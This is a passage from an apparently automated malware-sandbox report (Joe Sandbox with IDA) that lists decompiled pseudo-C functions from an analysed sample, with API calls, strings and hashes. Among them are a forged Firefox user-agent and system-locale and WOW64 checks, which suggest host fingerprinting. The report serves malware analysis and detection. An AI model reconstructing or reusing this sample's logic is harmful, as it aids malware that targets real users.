								__eflags =  *(_t380 - 0x54) -  *((intOrPtr*)(_t380 - 0x4c));
								E00419896(_t329,  *(_t380 - 0x54) -  *((intOrPtr*)(_t380 - 0x4c)), _t380 - 0x2c,  *(_t380 - 0x58), 0x30);
							} else {
								E0040D0BD( *(_t380 - 0x58), _t329, _t380 - 0x2c, 0x30);
							}
							_t319 =  *(_t380 - 0x64);
							_push(0x30);
							_t376 = _t380 - 0x2c;
							if( *(_t380 - 0x64) != 0) {
								_push( *(_t380 - 0x74));
								E00419896(_t329, _t319 -  *((intOrPtr*)(_t380 - 0x4c)) + 1, _t376);
								_t376 = _t380 - 0x2c;
								E00419896(_t329, _t319 -  *((intOrPtr*)(_t380 - 0x4c)), _t380 - 0x2c,  *(_t380 - 0x60), 0x30);
								_t67 = _t380 - 0x74;
								 *_t67 =  *(_t380 - 0x74) & 0x00000000;
								__eflags =  *_t67;
							} else {
								E0040D0BD( *(_t380 - 0x60), _t329, _t376);
							}
							 *(_t380 - 0x60) =  *(_t380 - 0x60) & 0x00000000;
							_t321 =  *((intOrPtr*)(_t380 - 0x48));
							if( *((intOrPtr*)(_t380 - 0x34)) < 0x10) {
								_t321 = _t380 - 0x48;
							}
							_t304 =  *((intOrPtr*)(_t380 - 0x2c));
							if( *((intOrPtr*)(_t380 - 0x18)) < 0x10) {
								_t304 = _t380 - 0x2c;
							}
							_t372 = E00422FD0(_t380 - 0x5c, _t304, _t380 - 0x5c);
							while(1) {
								_t306 =  *_t321;
								if(_t306 == 0x7f) {
									break;
								}
								__eflags = _t306;
								if(_t306 <= 0) {
									break;
								}
								_t356 = _t372 -  *(_t380 - 0x78);
								_t309 = _t306;
								__eflags = _t309 - _t372 -  *(_t380 - 0x78);
								if(_t309 >= _t372 -  *(_t380 - 0x78)) {
									break;
								}
								_t372 = _t372 - _t309;
								_t376 = _t380 - 0x2c;
								E00419896(_t356, _t372, _t380 - 0x2c, 1, 0);
								_t311 = _t321 + 1;
								__eflags =  *_t311;
								if( *_t311 > 0) {
									_t321 = _t311;
								}
							}
							_t307 =  *((intOrPtr*)(_t380 - 0x2c));
							if( *((intOrPtr*)(_t380 - 0x18)) < 0x10) {
								_t307 = _t380 - 0x2c;
							}
							 *(_t380 - 0x58) =  *(_t380 - 0x58) & 0x00000000;
							_t361 =  *((intOrPtr*)(_t380 - 0x7c));
							 *((intOrPtr*)(_t380 - 0x4c)) = _t307;
							 *((intOrPtr*)(_t380 - 0x50)) =  *((intOrPtr*)(_t380 - 0x1c));
							_t316 = 0;
						}
						goto L32;
					}
				}
				 *(_t380 - 0x78) = 0;
				_t393 = _t238 - 0x2d;
				if(_t238 != 0x2d) {
					goto L3;
				}
				goto L2;
			}

0x004199b9
0x004199b9
0x004199c3
0x004199cb
0x004199d1
0x004199d7
0x004199dd
0x004199e3
0x004199e9
0x004199eb
0x004199f6
0x004199f9
0x004199fe
0x00419a01
0x00419a04
0x00419a09
0x00419a0e
0x00419a16
0x00419a19
0x00419a24
0x00419a29
0x00419a32
0x00419a37
0x00419a3d
0x00419a44
0x00419a47
0x00419a4a
0x00419a4d
0x00419a51
0x00419a55
0x00419a5e
0x00419a5e
0x00419a65
0x00419a74
0x00419a77
0x00419a88
0x00419a91
0x00419a96
0x00419a99
0x00419a9e
0x00419aa0
0x00419aa0
0x00419aa7
0x00419aaa
0x00419aac
0x00419aac
0x00419ab2
0x00419bc7
0x00419bcd
0x00419bd3
0x00419bd6
0x00419bd9
0x00419bec
0x00419be5
0x00419be7
0x00419be7
0x00419bf2
0x00419bfa
0x00419c01
0x00419c0b
0x00419c11
0x00419c17
0x00419c19
0x00419c1c
0x00419c24
0x00419c27
0x00419c2a
0x00419c30
0x00419c30
0x00419c42
0x00419c49
0x00419c4f
0x00419c52
0x00419c55
0x00419c55
0x00419c63
0x00419c68
0x00419c6d
0x00419c7c
0x00419c90
0x00419c9d
0x00419ca3
0x00419cb0
0x00419cb7
0x00419cc0
0x00419cc8
0x00419cce
0x00419cd4
0x00419cd6
0x00419cd9
0x00419cdc
0x00419cf1
0x00419cf4
0x00419cf7
0x00419cfe
0x00419d01
0x00419d04
0x00419d0a
0x00419d0d
0x00419d10
0x00419d10
0x00419d1a
0x00419d1f
0x00419d24
0x00419d3a
0x00419d49
0x00419d56
0x00419d5c
0x00419d69
0x00419d70
0x00419d76
0x00419d7c
0x00419d83
0x00419d86
0x00419d8b
0x00419d8d
0x00419d8d
0x00419d97
0x00419d9d
0x00419d9f
0x00419da5
0x00419dab
0x00419db6
0x00419dbf
0x00419dc2
0x00419dc5
0x00419dc8
0x00419dc8
0x00419de1
0x00419dee
0x00419df4
0x00419e01
0x00419e0b
0x00419e14
0x00419e1c
0x00419e1f
0x00419e22
0x00419e25
0x00419e33
0x00419e3e
0x00419e4a
0x00419ab8
0x00419abc
0x00419abf
0x00419ac1
0x00419ac1
0x00419ac4
0x00419ac7
0x00419ad4
0x00419add
0x00419aee
0x00419af2
0x00419afc
0x00419b01
0x00419b01
0x00419b01
0x00419b01
0x00419b08
0x00419b13
0x00419adf
0x00419ae7
0x00419ae7
0x00419b18
0x00419b1b
0x00419b1d
0x00419b22
0x00419b31
0x00419b37
0x00419b43
0x00419b46
0x00419b4b
0x00419b4b
0x00419b4b
0x00419b24
0x00419b27
0x00419b27
0x00419b4f
0x00419b57
0x00419b5a
0x00419b5c
0x00419b5c
0x00419b63
0x00419b66
0x00419b68
0x00419b68
0x00419b77
0x00419ba3
0x00419ba3
0x00419ba7
0x00000000
0x00000000
0x00419b7b
0x00419b7d
0x00000000
0x00000000
0x00419b81
0x00419b84
0x00419b87
0x00419b89
0x00000000
0x00000000
0x00419b8d
0x00419b91
0x00419b94
0x00419b99
0x00419b9c
0x00419b9f
0x00419ba1
0x00419ba1
0x00419b9f
0x00419bad
0x00419bb0
0x00419bb2
0x00419bb2
0x00419bb5
0x00419bb9
0x00419bbc
0x00419bc2
0x00419bc5
0x00419bc5
0x00000000
0x00419ac7
0x00419ab2
0x00419a57
0x00419a5a
0x00419a5c
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 004199C3

Part of subcall function 0040F564: std::locale::facet::_Incref.LIBCPMT ref: 0040F56B

Part of subcall function 0041A353: __EH_prolog3.LIBCMT ref: 0041A35A
Part of subcall function 0041A353: std::_Lockit::_Lockit.LIBCPMT ref: 0041A364

_localeconv.LIBCMT ref: 00419A65
_strcspn.LIBCMT ref: 00419B70

Strings

e, xrefs: 00419A77

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: H_prolog3H_prolog3_IncrefLockitLockit::__localeconv_strcspnstd::_std::locale::facet::_
String ID: e
API String ID: 441263477-4024072794
Opcode ID: acb6e9a088d682e4e0f1b271d9357a26efb18267d8d0647b971743b8a4c820d8
Instruction ID: d3aa7038888a8903589468b0862019d9631b3ec103b02b3323430a63cecb6780
Opcode Fuzzy Hash: acb6e9a088d682e4e0f1b271d9357a26efb18267d8d0647b971743b8a4c820d8
Instruction Fuzzy Hash: 6B021171E002089FDF15DFA8C990ADDBBB5BF08308F15816AE909BB252D775AD85CF48

Uniqueness

Uniqueness Score: -1.00%

Function 00415905 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00415905(void* __ebx, signed int* __ecx, void* __edi, signed int __esi, void* __eflags) {
				intOrPtr _t48;
				signed int _t53;
				void* _t58;
				intOrPtr _t59;
				intOrPtr _t62;
				void* _t63;
				void* _t65;
				intOrPtr* _t67;
				signed int* _t68;
				void* _t75;
				signed int _t77;
				intOrPtr _t85;
				signed int* _t89;
				signed int _t93;
				void* _t96;
				void* _t97;

				_push(0x2c);
				E00423679(E00433362, __ebx, __edi, __esi);
				_t72 =  *(_t96 + 8);
				_t91 = __esi | 0xffffffff;
				_t89 = __ecx;
				if(_t72 != _t91) {
					_t77 =  *( *(__ecx + 0x24));
					__eflags = _t77;
					if(_t77 == 0) {
						L6:
						__eflags = _t89[0x15];
						if(_t89[0x15] != 0) {
							E004162A1(_t89);
							__eflags = _t89[0x11];
							if(__eflags != 0) {
								 *(_t96 - 0x2d) = _t72;
								E00415F9A(_t72, _t89, _t96 - 0x2c, __eflags);
								_t11 = _t96 - 4;
								 *_t11 =  *(_t96 - 4) & 0x00000000;
								__eflags =  *_t11;
								while(1) {
									__eflags =  *((intOrPtr*)(_t96 - 0x18)) - 0x10;
									_t48 =  *((intOrPtr*)(_t96 - 0x2c));
									if( *((intOrPtr*)(_t96 - 0x18)) >= 0x10) {
										_t85 =  *((intOrPtr*)(_t96 - 0x2c));
									} else {
										_t48 = _t96 - 0x2c;
										_t85 = _t48;
									}
									_t78 = _t89[0x11];
									_t93 =  *(_t89[0x11]);
									_t72 =  *((intOrPtr*)(_t96 - 0x1c)) + _t48;
									_t53 =  *((intOrPtr*)(_t93 + 0x14))( &(_t89[0x13]), _t96 - 0x2d, _t96 - 0x2c, _t96 - 0x38, _t85,  *((intOrPtr*)(_t96 - 0x1c)) + _t48, _t96 - 0x34);
									__eflags = _t53;
									if(_t53 < 0) {
										break;
									}
									__eflags = _t53 - 1;
									if(_t53 > 1) {
										__eflags = _t53 - 3;
										if(__eflags != 0) {
											break;
										}
										_push(_t89[0x15]);
										_push( *(_t96 - 0x2d));
										_t58 = E00422028(_t72, _t89, _t93, __eflags);
										_t91 = _t93 | 0xffffffff;
										__eflags = _t58 - _t91;
										if(_t58 == _t91) {
											L31:
											E00404A66(_t96 - 0x2c, 1, 0);
											goto L7;
										}
										L29:
										_t91 =  *(_t96 + 8);
										goto L31;
									}
									__eflags =  *((intOrPtr*)(_t96 - 0x18)) - 0x10;
									_t59 =  *((intOrPtr*)(_t96 - 0x2c));
									if( *((intOrPtr*)(_t96 - 0x18)) < 0x10) {
										_t59 = _t96 - 0x2c;
									}
									_t93 =  *((intOrPtr*)(_t96 - 0x34)) - _t59;
									__eflags = _t93;
									if(_t93 == 0) {
										L22:
										_t89[0x12] = 1;
										__eflags =  *((intOrPtr*)(_t96 - 0x38)) - _t96 - 0x2d;
										if( *((intOrPtr*)(_t96 - 0x38)) != _t96 - 0x2d) {
											goto L29;
										}
										__eflags = _t93;
										if(_t93 != 0) {
											continue;
										}
										__eflags =  *((intOrPtr*)(_t96 - 0x1c)) - 0x20;
										if( *((intOrPtr*)(_t96 - 0x1c)) >= 0x20) {
											break;
										}
										_push(_t93);
										_t75 = 8;
										E0040D0BD(_t75, _t78, _t96 - 0x2c);
										continue;
									} else {
										__eflags =  *((intOrPtr*)(_t96 - 0x18)) - 0x10;
										_t62 =  *((intOrPtr*)(_t96 - 0x2c));
										if(__eflags < 0) {
											_t62 = _t96 - 0x2c;
										}
										_push(_t89[0x15]);
										_push(_t93);
										_push(1);
										_push(_t62);
										_t63 = E00422C4B(_t72, _t85, _t89, _t93, __eflags);
										_t97 = _t97 + 0x10;
										__eflags = _t93 - _t63;
										if(_t93 != _t63) {
											break;
										}
										goto L22;
									}
								}
								_t91 = _t93 | 0xffffffff;
								__eflags = _t93 | 0xffffffff;
								goto L31;
							}
							_push(_t89[0x15]);
							_push(_t72);
							_t65 = E00422028(_t72, _t89, _t91, __eflags);
							__eflags = _t65 - _t91;
							if(_t65 != _t91) {
								L2:
								return E004236C3(_t72, _t89, _t91);
							}
						}
						L7:
						goto L2;
					}
					_t67 =  *((intOrPtr*)(__ecx + 0x34));
					__eflags = _t77 -  *_t67 + _t77;
					if(_t77 >=  *_t67 + _t77) {
						goto L6;
					}
					 *_t67 =  *_t67 - 1;
					_t89 =  *(__ecx + 0x24);
					_t68 =  *_t89;
					 *_t89 =  &(_t68[0]);
					 *_t68 = _t72;
					goto L2;
				}
				goto L2;
			}

0x00415905
0x0041590c
0x00415911
0x00415914
0x00415917
0x0041591b
0x0041592a
0x0041592c
0x0041592e
0x0041594d
0x0041594d
0x00415951
0x00415959
0x0041595e
0x00415962
0x0041597d
0x00415980
0x00415985
0x00415985
0x00415985
0x00415989
0x00415989
0x0041598d
0x00415990
0x00415a28
0x00415996
0x00415996
0x00415999
0x00415999
0x0041599b
0x0041599e
0x004159a7
0x004159bb
0x004159be
0x004159c0
0x00000000
0x00000000
0x004159c6
0x004159c9
0x00415a30
0x00415a33
0x00000000
0x00000000
0x00415a39
0x00415a3c
0x00415a3d
0x00415a42
0x00415a47
0x00415a49
0x00415a53
0x00415a5a
0x00000000
0x00415a5a
0x00415a4b
0x00415a4b
0x00000000
0x00415a4b
0x004159cb
0x004159cf
0x004159d2
0x004159d4
0x004159d4
0x004159da
0x004159da
0x004159dc
0x004159fd
0x00415a00
0x00415a04
0x00415a07
0x00000000
0x00000000
0x00415a09
0x00415a0b
0x00000000
0x00000000
0x00415a11
0x00415a15
0x00000000
0x00000000
0x00415a17
0x00415a1a
0x00415a1e
0x00000000
0x004159de
0x004159de
0x004159e2
0x004159e5
0x004159e7
0x004159e7
0x004159ea
0x004159ed
0x004159ee
0x004159f0
0x004159f1
0x004159f6
0x004159f9
0x004159fb
0x00000000
0x00000000
0x00000000
0x004159fb
0x004159dc
0x00415a50
0x00415a50
0x00000000
0x00415a50
0x00415964
0x0041596a
0x0041596b
0x00415971
0x00415976
0x0041591f
0x00415924
0x00415924
0x00415978
0x00415953
0x00000000
0x00415953
0x00415930
0x00415937
0x00415939
0x00000000
0x00000000
0x0041593b
0x0041593d
0x00415940
0x00415945
0x00415947
0x00000000
0x00415949
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 0041590C
_fputc.LIBCMT ref: 0041596B
_fputc.LIBCMT ref: 00415A3D

Strings

, xrefs: 00415A11

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _fputc$H_prolog3_
String ID:
API String ID: 668804286-3916222277
Opcode ID: 885b2176ad9669f0ff80b8e1c1a13a8fb63c64433adeb0d6f15d308ae32996ca
Instruction ID: b570da66ad6252eaf9300ce79a942c697a0bb01364b53d0f1496bc52c279db29
Opcode Fuzzy Hash: 885b2176ad9669f0ff80b8e1c1a13a8fb63c64433adeb0d6f15d308ae32996ca
Instruction Fuzzy Hash: 1041A271E50919DFCF20DBA8C580AEEB7B4BF58324F50811BE511B7240D778E984CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00418217 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00418242
_memset.LIBCMT ref: 004182A2

Strings

image/jpeg, xrefs: 0041826C

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _malloc_memset
String ID: image/jpeg
API String ID: 4137368368-3785015651
Opcode ID: 714e3e4bc94285278cb6ba5278ef166afa75aeb22015e9e686819dedd18e185d
Instruction ID: 498d95a45757336b451ae64123274e28192349ac72ebdb45d9d2b4db8a3b083d
Opcode Fuzzy Hash: 714e3e4bc94285278cb6ba5278ef166afa75aeb22015e9e686819dedd18e185d
Instruction Fuzzy Hash: 49118272D00918FBCF12DF999D416CEBBB9FF05760F2002AAF81176190CB755A859BC9

Uniqueness

Uniqueness Score: -1.00%

Function 004173A7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E004173A7(char* __ebx, char* __edi, void* __esi, void* __eflags) {
				void* _t34;
				char* _t43;
				void* _t47;
				void* _t56;

				_t48 = __edi;
				_t43 = __ebx;
				_push(0x108);
				E00423679(E004332B9, __ebx, __edi, __esi);
				_t52 = 0;
				 *((intOrPtr*)(_t56 - 0x114)) = 0;
				 *((intOrPtr*)(_t56 - 0xc4)) = 0xf;
				 *((intOrPtr*)(_t56 - 0xc8)) = 0;
				 *((char*)(_t56 - 0xd8)) = 0;
				 *((intOrPtr*)(_t56 - 4)) = 0;
				 *((short*)(_t56 - 0xbc)) = 0;
				E0041F6B0(_t56 - 0xba, 0, 0xa8);
				_push(0x55);
				_push(_t56 - 0xbc);
				if( *0x4473d4() != 0) {
					E004177A0(_t56 - 0xf4, _t56 - 0xbc);
					 *((char*)(_t56 - 4)) = 1;
					_t34 = E00417D3E(_t56 - 0xf4, _t47, _t56 - 0x110);
					 *((char*)(_t56 - 4)) = 2;
					E00404A22(_t56 - 0xd8, _t34);
					E00404A66(_t56 - 0x110, 1, 0);
					 *((char*)(_t56 - 4)) = 0;
					E0040CE40(0, _t56 - 0xf4, 1);
					 *(__ebx + 0x10) =  *(__ebx + 0x10) & 0;
					 *((intOrPtr*)(__ebx + 0x14)) = 0xf;
					_t52 = _t56 - 0xd8;
					_t48 = __ebx;
					 *__ebx = 0;
					E00404A22(__ebx, _t56 - 0xd8);
					_push(0);
				} else {
					E004049CF(__ebx, "Unknown");
					_push(0);
				}
				_push(1);
				E00404A66(_t56 - 0xd8);
				return E004236C3(_t43, _t48, _t52);
			}

0x004173a7
0x004173a7
0x004173a7
0x004173b1
0x004173b6
0x004173b8
0x004173be
0x004173c8
0x004173ce
0x004173d7
0x004173df
0x004173ee
0x004173f6
0x004173fe
0x00417407
0x00417425
0x00417433
0x00417437
0x00417444
0x00417448
0x00417457
0x00417466
0x0041746a
0x0041746f
0x00417472
0x00417479
0x0041747f
0x00417481
0x00417484
0x00417489
0x00417409
0x00417410
0x00417415
0x00417415
0x0041748b
0x00417493
0x0041749f

APIs

__EH_prolog3_GS.LIBCMT ref: 004173B1
_memset.LIBCMT ref: 004173EE
GetUserDefaultLocaleName.KERNEL32(?,00000055), ref: 004173FF

Part of subcall function 004049CF: _strlen.LIBCMT ref: 004049E6

Strings

Unknown, xrefs: 00417409

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: DefaultH_prolog3_LocaleNameUser_memset_strlen
String ID: Unknown
API String ID: 3714402851-1654365787
Opcode ID: 4e502380fc65b3ba57da27c8c7757ef4d8eeae610d11aea18b4fb41a76298e5f
Instruction ID: 0dd6d8ee16f869988551d600d34993146875f8e020f679ad09e1157470290f72
Opcode Fuzzy Hash: 4e502380fc65b3ba57da27c8c7757ef4d8eeae610d11aea18b4fb41a76298e5f
Instruction Fuzzy Hash: 7D21CB71E402289ADB61EB658D05BCD76745F04704F4040EBE608B71C2DBB85F888FA5

Uniqueness

Uniqueness Score: -1.00%

Function 00417704 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00417704(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t20;
				void* _t24;
				intOrPtr _t42;
				void* _t48;

				_push(0x28);
				E00423679(E004335E4, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t48 - 4)) = 0;
				_t42 = __ecx;
				 *((intOrPtr*)(_t48 - 0x34)) = __ecx;
				 *((intOrPtr*)(_t48 - 0x30)) = 0;
				E004049CF(__ecx, 0x43d12c);
				 *((intOrPtr*)(_t48 - 4)) = 0;
				_t45 = "Mozilla/5.0 (Windows NT 10.0;";
				 *((intOrPtr*)(_t48 - 0x30)) = 1;
				E00404AAA(_t42, 1, "Mozilla/5.0 (Windows NT 10.0;", E004201E0("Mozilla/5.0 (Windows NT 10.0;"));
				_push(E0041714D(_t42));
				_push(_t48 - 0x2c);
				_t20 = E0040CEE5(1, _t42, _t45, 1);
				 *((intOrPtr*)(_t48 - 4)) = 1;
				E00404A22(_t42, _t20);
				 *((char*)(_t48 - 4)) = 0;
				E00404A66(_t48 - 0x2c, 1, 0);
				_push(" rv:107.0) Gecko / 20100101 Firefox / 107.0");
				_push(_t48 - 0x2c);
				_t24 = E0040CEE5(1, _t42, _t20, 1);
				 *((intOrPtr*)(_t48 - 4)) = 2;
				E00404A22(_t42, _t24);
				E00404A66(_t48 - 0x2c, 1, 0);
				return E004236C3(1, _t42, _t24);
			}

0x00417704
0x0041770b
0x00417712
0x00417715
0x0041771c
0x0041771f
0x00417722
0x00417727
0x0041772c
0x00417733
0x00417740
0x0041774a
0x0041774e
0x0041774f
0x00417758
0x0041775b
0x00417766
0x0041776a
0x00417772
0x00417777
0x00417778
0x00417781
0x00417788
0x00417793
0x0041779f

APIs

__EH_prolog3_GS.LIBCMT ref: 0041770B

Part of subcall function 004049CF: _strlen.LIBCMT ref: 004049E6

_strlen.LIBCMT ref: 00417736

Part of subcall function 0041714D: GetCurrentProcess.KERNEL32(00000000,?,?,0040BE6C,?,?,?,004341E4,000000FF), ref: 00417159
Part of subcall function 0041714D: IsWow64Process.KERNEL32(00000000,?,?,0040BE6C,?,?,?,004341E4,000000FF), ref: 00417160

Part of subcall function 0040CEE5: __EH_prolog3.LIBCMT ref: 0040CEEC
Part of subcall function 0040CEE5: _strlen.LIBCMT ref: 0040CF18
Part of subcall function 0040CEE5: _strlen.LIBCMT ref: 0040CF35

Part of subcall function 00404A22: _memmove.LIBCMT ref: 00404A3E

Part of subcall function 00404A66: _memmove.LIBCMT ref: 00404A86

Strings

Mozilla/5.0 (Windows NT 10.0;, xrefs: 0041772C, 00417732, 0041773D
rv:107.0) Gecko / 20100101 Firefox / 107.0, xrefs: 00417772

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _strlen$Process_memmove$CurrentH_prolog3H_prolog3_Wow64
String ID: rv:107.0) Gecko / 20100101 Firefox / 107.0$Mozilla/5.0 (Windows NT 10.0;
API String ID: 1122765411-3025765437
Opcode ID: 9985d5a249e2769fd6ffd233038cdca14518fc8f8c8f231706e80c398c337918
Instruction ID: 03d08aa7bba543439bfdcfc4453eea0199ce1912b246f2a0c2fcb70630b94d91
Opcode Fuzzy Hash: 9985d5a249e2769fd6ffd233038cdca14518fc8f8c8f231706e80c398c337918
Instruction Fuzzy Hash: 880165B2E45214AADB00EFB9D882BDDB2B89F48714F60916FF501B72C1DA7C4A04475C

Uniqueness

Uniqueness Score: -1.00%

Function 0042567A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 30%

			E0042567A(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E004255E8(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E00423265(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E00425059(_t22, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_t14 = _t22 + 0xc; // 0x6e
				_push(_t27);
				_push(_a4);
				_t20 = E004252CD(_t22,  *_t14, _t25, _t26, _t27, _t31);
				if(_t20 != 0) {
					E0042322C(_t20, _t27);
					return _t20;
				}
				return _t20;
			}

0x0042567a
0x0042567a
0x0042567a
0x0042567a
0x0042567a
0x0042567f
0x00425683
0x00425685
0x00425688
0x00425689
0x0042568a
0x0042568d
0x00425692
0x00425692
0x00425695
0x00425699
0x0042569c
0x004256a1
0x0042569e
0x0042569e
0x0042569e
0x004256a4
0x004256a9
0x004256ab
0x004256ae
0x004256b1
0x004256b2
0x004256ba
0x004256bf
0x004256c3
0x004256c6
0x004256c9
0x004256cc
0x004256cf
0x004256d0
0x004256d3
0x004256dd
0x004256e1
0x00000000
0x004256e1
0x004256e7

APIs

___BuildCatchObject.LIBCMT ref: 0042568D

Part of subcall function 004255E8: ___BuildCatchObjectHelper.LIBCMT ref: 0042561E

_UnwindNestedFrames.LIBCMT ref: 004256A4
___FrameUnwindToState.LIBCMT ref: 004256B2

Strings

bad exception, xrefs: 00425688

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: bad exception
API String ID: 2163707966-3837556057
Opcode ID: c92194c6658dad9f4a1ed228b616b1e0aa61315e0de5e5227c4180eda951f2cb
Instruction ID: 101d77701ca521f83c180588d2429dab31bb754f621f7372e5404302bbc0d199
Opcode Fuzzy Hash: c92194c6658dad9f4a1ed228b616b1e0aa61315e0de5e5227c4180eda951f2cb
Instruction Fuzzy Hash: 4A014671200529FBCF126F52EC45EAB3F6AEF08398F804016BD1C54121D73AD9B1DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041A4FB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0041A4FB(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t34;
				intOrPtr* _t38;
				intOrPtr _t40;
				void* _t41;
				void* _t42;

				_t42 = __eflags;
				_push(4);
				E00423643(E00432EF5, __ebx, __edi, __esi);
				_t40 =  *((intOrPtr*)(_t41 + 8));
				_t38 = E00422F73(__edi, _t40, _t42);
				 *((intOrPtr*)(_t40 + 8)) = 0;
				 *((intOrPtr*)(_t40 + 0x10)) = 0;
				 *((intOrPtr*)(_t40 + 0x14)) = 0;
				 *((intOrPtr*)(_t41 - 4)) = 0;
				E0041F593();
				 *((intOrPtr*)(_t40 + 8)) = E0041A5B0(0x43d12c, 0);
				E0041F593();
				 *((intOrPtr*)(_t40 + 0x10)) = E0041A5B0("false", 0);
				E0041F593();
				 *((intOrPtr*)(_t40 + 0x14)) = E0041A5B0("true", 0);
				E0041F593();
				 *((char*)(_t40 + 0xc)) =  *((intOrPtr*)( *_t38));
				E0041F593();
				 *((char*)(_t40 + 0xd)) =  *((intOrPtr*)( *((intOrPtr*)(_t38 + 4))));
				E0041F593();
				 *((char*)(_t40 + 0xc)) = 0x2e;
				_t34 = E0041F593();
				 *((char*)(_t40 + 0xd)) = 0x2c;
				return E004236AF(_t34);
			}

0x0041a4fb
0x0041a4fb
0x0041a502
0x0041a507
0x0041a50f
0x0041a513
0x0041a516
0x0041a519
0x0041a51c
0x0041a51f
0x0041a52e
0x0041a531
0x0041a540
0x0041a543
0x0041a552
0x0041a555
0x0041a55e
0x0041a561
0x0041a56b
0x0041a56e
0x0041a573
0x0041a577
0x0041a57c
0x0041a585

APIs

__EH_prolog3_catch.LIBCMT ref: 0041A502
_localeconv.LIBCMT ref: 0041A50A

Part of subcall function 00422F73: __getptd.LIBCMT ref: 00422F73

Part of subcall function 0041F593: ____lc_handle_func.LIBCMT ref: 0041F596
Part of subcall function 0041F593: ____lc_codepage_func.LIBCMT ref: 0041F59E

Part of subcall function 0041A5B0: _strlen.LIBCMT ref: 0041A5B5

Strings

false, xrefs: 0041A536
true, xrefs: 0041A548

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: H_prolog3_catch____lc_codepage_func____lc_handle_func__getptd_localeconv_strlen
String ID: false$true
API String ID: 2072887900-2658103896
Opcode ID: 00f89caf0ac685ff87b70199637f860a73820fe69a27ba1e496fcd22d9abf152
Instruction ID: bcc06d2aee252c61af42dead21e2ed0e37a64601987712e03c64a0b89bab95a1
Opcode Fuzzy Hash: 00f89caf0ac685ff87b70199637f860a73820fe69a27ba1e496fcd22d9abf152
Instruction Fuzzy Hash: 7501ED74D09740EECB20AF76900134A7BE66F09308B44987FA1958BB03DABCD5598799

Uniqueness

Uniqueness Score: -1.00%

Function 00E82D58 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31
COMMON

Download Yara Rule

